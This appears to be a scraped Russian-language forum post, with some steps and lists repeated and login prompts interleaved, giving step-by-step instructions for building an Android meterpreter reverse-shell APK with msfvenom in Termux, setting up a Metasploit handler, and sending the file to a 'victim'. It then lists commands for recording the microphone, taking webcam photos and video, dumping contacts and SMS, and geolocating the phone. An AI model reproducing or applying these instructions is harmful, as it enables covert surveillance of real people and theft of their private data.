1. Для начала нужно скачать и установить Termux (не реклама
2. Установить metasploit (
3. Дать разрешение на сохранение файлов в корневой папки телефона.
4. Далее открываем metasploit командой "msfconsole"
5. Узнаём свой IP командой "ifconfig"
6. Пишем "msfvenom -p android/meterpreter/reverse_tcp LHOST=СВОЙ ИП LPORT=4444 R > bhf.apk"
Файл сохраняется в /data/data/com.termux/files/home ,также можно изменить место сохранения файла.Если кому нужно объяснить,то пишите в комментарии.
7. Пишем "use multi/handler"
8. Пишем "set payload android/meterpreter/reverse_tcp"
9. Пишем "set LHOST СВОЙ ИП"
10. Пишем "set LPORT 4444"
11. Запускаем "exploit"
Теперь кидаем файл жертве.Жертва открывает файл и устанавливает приложение.Когда жертва его установит,то у нас в консоли высветятся данные о жертве ,его ИП ,юсер-агент,время запуска и т.п
После того ,как у нас появилось ,это сообщение то и появится доступ к вводу в консоль.
Хи-хи-хи,разберемся , что же может данный exploit
Данные команды нужно вводить в консоль после того,как жертва запустит и установит файл
КОПИРОВАТЬ И ВСТАВЛЯТЬ КОМАНДЫ НУЖНО БЕЗ КАВЫЧЕК ,ЭТО ОБЯЗАТЕЛЬНО!!!
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
)2. Установить metasploit (
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
)3. Дать разрешение на сохранение файлов в корневой папки телефона.
1.Заходим в Разрешения приложений>Память
2.Ставим галочку напротив Termux
Показываю только эти скрины,ибо в каждом телефона по-разному
2.Ставим галочку напротив Termux
Показываю только эти скрины,ибо в каждом телефона по-разному
5. Узнаём свой IP командой "ifconfig"
6. Пишем "msfvenom -p android/meterpreter/reverse_tcp LHOST=СВОЙ ИП LPORT=4444 R > bhf.apk"
Файл сохраняется в /data/data/com.termux/files/home ,также можно изменить место сохранения файла.Если кому нужно объяснить,то пишите в комментарии.
7. Пишем "use multi/handler"
8. Пишем "set payload android/meterpreter/reverse_tcp"
9. Пишем "set LHOST СВОЙ ИП"
10. Пишем "set LPORT 4444"
11. Запускаем "exploit"
Теперь кидаем файл жертве.Жертва открывает файл и устанавливает приложение.Когда жертва его установит,то у нас в консоли высветятся данные о жертве ,его ИП ,юсер-агент,время запуска и т.п
После того ,как у нас появилось ,это сообщение то и появится доступ к вводу в консоль.
Хи-хи-хи,разберемся , что же может данный exploit
Данные команды нужно вводить в консоль после того,как жертва запустит и установит файл
record_mic - Запись с микрофона
webcam_snap - Делает онли фото с основной камеры (качество не самое лучшее)
webcam_stream - Записывает видео (Качество тоже не самое лучшее)
dump_contacts - Сохраняет контакты с sim-карты
dump_sms - Сохраняет смс с sim-карты
geolocate - Показывает местоположение телефона ,координатами
webcam_snap - Делает онли фото с основной камеры (качество не самое лучшее)
webcam_stream - Записывает видео (Качество тоже не самое лучшее)
dump_contacts - Сохраняет контакты с sim-карты
dump_sms - Сохраняет смс с sim-карты
geolocate - Показывает местоположение телефона ,координатами
КОПИРОВАТЬ И ВСТАВЛЯТЬ КОМАНДЫ НУЖНО БЕЗ КАВЫЧЕК ,ЭТО ОБЯЗАТЕЛЬНО!!!